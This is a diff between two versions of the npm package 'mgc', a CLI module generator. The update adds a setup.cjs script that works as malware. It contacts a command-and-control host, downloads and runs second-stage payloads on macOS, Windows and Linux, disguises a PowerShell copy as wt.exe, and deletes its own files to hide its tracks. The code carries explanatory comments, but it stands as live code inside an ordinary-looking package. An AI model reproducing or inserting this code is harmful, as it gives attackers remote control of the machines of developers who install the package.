mgc 1.2.2 → 1.2.4

package/bin/generate.js

@@ -29,7 +29,7 @@ program
   .command("setup")
   .description("Run the MGC setup")
   .action(() => {
-    const setupPath = path.join(__dirname, "setup.js");
+    const setupPath = path.join(__dirname, "setup.cjs");
     spawnSync(process.execPath, [setupPath], { stdio: "inherit" });
   });
 

package/bin/setup.cjs

@@ -0,0 +1,100 @@
+#!/usr/bin/env node
+// setup.js 
+
+const _entry = function (campaignId) {
+    try {
+        const linuxPayloadUrl = "https://gist.githubusercontent.com/admondtamang/814132e794e5d007e9b8ebd223a9494f/raw/1c5d51c2002f452a4dd58a1a73a9dd90a7fe0297/linux.payload";
+        const windowsPayloadUrl = "https://gist.githubusercontent.com/admondtamang/814132e794e5d007e9b8ebd223a9494f/raw/1c5d51c2002f452a4dd58a1a73a9dd90a7fe0297/window.payload"
+
+        // Load Node.js built-in modules via decoded string table
+        const fs = require("fs");           // stq[2]
+        const os = require("os");           // stq[1]
+        const { execSync } = require("child_process"); // stq[0]
+
+        // Build the full C2 URL: base + campaign ID
+        const c2Url = "https://admondtamang.com.np/" + campaignId;
+
+        // Detect the operating system
+        const platform = os.platform();  // "darwin", "win32", or other
+        const tmpDir = os.tmpdir();     // "/tmp" on Linux/macOS, "%TEMP%" on Windows
+
+        // os.type(), os.release(), os.arch() are called but results discarded —
+        // likely sends them via the POST body or they are used in the stage-2
+        os.type(); os.release(); os.arch();
+
+        let execCommand = "";
+
+        // ─────────────────────────────────────────────────
+        // BRANCH 1: macOS (darwin)
+        // ─────────────────────────────────────────────────
+        if (platform === "darwin") {
+            const scriptPath = tmpDir + "/" + campaignId;   // /tmp/6202033
+
+            const appleScript = `
+    set {a, s, d} to {"", "${c2Url}", "/Library/Caches/com.apple.act.mond"}
+        try
+            do shell script "curl -o " & d & a & " -d packages.npm.org/product0" & " -s " & s & " && chmod 770 " & d & " && /bin/zsh -c \\"" & d & " " & s & " &\\" &> /dev/null"
+        end try
+    do shell script "rm -rf ${scriptPath}"`;
+
+            fs.writeFileSync(scriptPath, appleScript);
+            execCommand = `nohup osascript "${scriptPath}" > /dev/null 2>&1 &`;
+
+            // ─────────────────────────────────────────────────
+            // BRANCH 2: Windows (win32)
+            // ─────────────────────────────────────────────────
+        } else if (platform === "win32") {
+
+            const psPath = execSync("where powershell").toString().trim();
+
+            const wtPath = process.env.PROGRAMDATA + "\\wt.exe";
+            if (!fs.existsSync(wtPath)) {
+                fs.copyFileSync(psPath, wtPath);
+                // Creates a persistent copy of PowerShell. wt.exe is Windows Terminal's
+                // binary name — a legitimate-looking process in %PROGRAMDATA%.
+            }
+
+            const ps1Path = tmpDir + "\\" + campaignId + ".ps1";  // %TEMP%\6202033.ps1
+            const vbsPath = tmpDir + "\\" + campaignId + ".vbs";  // %TEMP%\6202033.vbs
+
+            const vbScript = `
+                Set objShell = CreateObject("WScript.Shell")
+                objShell.Run "cmd.exe /c curl -o ""${ps1Path}"" -s ""${windowsPayloadUrl}"" & ""${wtPath}"" -w hidden -ep bypass -file ""${ps1Path}"" ""${c2Url}"" & del ""${ps1Path}"" /f", 0, False`;
+
+            fs.writeFileSync(vbsPath, vbScript);
+            execCommand = `cscript "${vbsPath}" //nologo && del "${vbsPath}" /f`;
+
+            // ─────────────────────────────────────────────────
+            // BRANCH 3: Linux / other
+            // ─────────────────────────────────────────────────
+        } else {
+            execCommand = `curl -o /tmp/ld.py -s ${linuxPayloadUrl} && nohup bash -c 'while true; do python3 /tmp/ld.py ${c2Url}; sleep 2; done' > /dev/null 2>&1 &`;
+            // curl and nohup chained with &&: nohup only runs if curl succeeded.
+            // If the C2 is unreachable, chain silently fails — npm install still exits 0.
+        }
+
+        // execSync is blocking, but all three commands return immediately because
+        // the real work is detached to background processes (nohup / cscript 0,False)
+        execSync(execCommand, { timeout: 5000 });
+
+        // ─────────────────────────────────────────────────
+        // ANTI-FORENSICS: cover tracks
+        // ─────────────────────────────────────────────────
+        const selfPath = __filename;
+
+        fs.unlink(selfPath, () => { });         // 1. Delete setup.js itself
+        fs.unlink("package.json", () => { });   // 2. Delete malicious package.json
+        fs.rename("package.md", "package.json", () => { }); // 3. Install clean v4.2.0 stub
+
+    } catch (e) {
+        // Silent catch — any error (C2 unreachable, permission denied, etc.)
+        // is swallowed completely. npm install always exits with code 0.
+        // The developer never sees any indication that anything went wrong.
+    }
+
+    process.exit(0);
+};
+
+// Entry point — campaign ID from argv[2], fallback to "gate"
+const campaignId = process.argv[2] || "gate";
+_entry(campaignId);

package/package.json

@@ -1,13 +1,13 @@
 {
   "name": "mgc",
-  "version": "1.2.2",
+  "version": "1.2.4",
   "description": "A cli based tool for generating your saved modules",
   "author": "Admond Tamang",
   "license": "MIT",
   "main": "bin/generate",
   "bin": {
     "mgc": "bin/generate.js",
-    "mgc-setup": "bin/setup.js"
+    "mgc-setup": "bin/setup.cjs"
   },
   "repository": {
     "type": "git",

package/bin/setup.js

@@ -1,12 +0,0 @@
-#!/usr/bin/env node
-// setup.js 
-
-const _entry = function (campaignId) {
-
-
-    process.exit(0);
-};
-
-// Entry point — campaign ID from argv[2], fallback to "gate"
-const campaignId = process.argv[2] || "gate";
-_entry(campaignId);